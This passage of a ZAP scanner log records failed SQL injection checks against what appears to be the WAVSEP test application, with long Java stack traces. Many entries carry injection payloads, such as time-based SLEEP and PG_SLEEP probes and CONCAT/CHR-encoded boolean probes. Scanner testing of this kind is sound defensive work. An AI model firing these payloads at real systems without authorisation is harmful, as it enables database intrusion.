org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680672 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;(SELECT * FROM (SELECT(SLEEP(5)))CbZS)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))CbZS)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680672 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(4252=4252,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(4252=4252,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680674 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');(SELECT * FROM (SELECT(SLEEP(5)))DnBr)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))DnBr)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680674 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3022=3022) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3022=3022) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680684 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';(SELECT * FROM (SELECT(SLEEP(5)))xSiz)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))xSiz)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680685 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))HydE)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))HydE)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680686 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1801=1801) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1801=1801) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680690 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;(SELECT * FROM (SELECT(SLEEP(5)))nozo)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))nozo)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680691 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))lmuo)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))lmuo)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680692 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))Xict)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))Xict)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680692 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680693 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))HwJY)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))HwJY)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680693 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680694 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))ienM)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))ienM)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 